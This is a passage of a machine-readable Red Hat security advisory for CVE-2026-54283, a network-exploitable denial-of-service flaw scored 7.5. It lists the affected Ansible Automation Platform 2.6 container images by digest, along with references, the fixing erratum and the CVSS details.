"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-54283"
},
{
"category": "external",
"summary": "RHBZ#2491440",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2491440"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-54283",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54283"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-54283",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54283"
},
{
"category": "external",
"summary": "https://github.com/Kludex/starlette/security/advisories/GHSA-82w8-qh3p-5jfq",
"url": "https://github.com/Kludex/starlette/security/advisories/GHSA-82w8-qh3p-5jfq"
}
],
"release_date": "2026-06-22T16:46:16.706000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T21:39:16+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50479"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
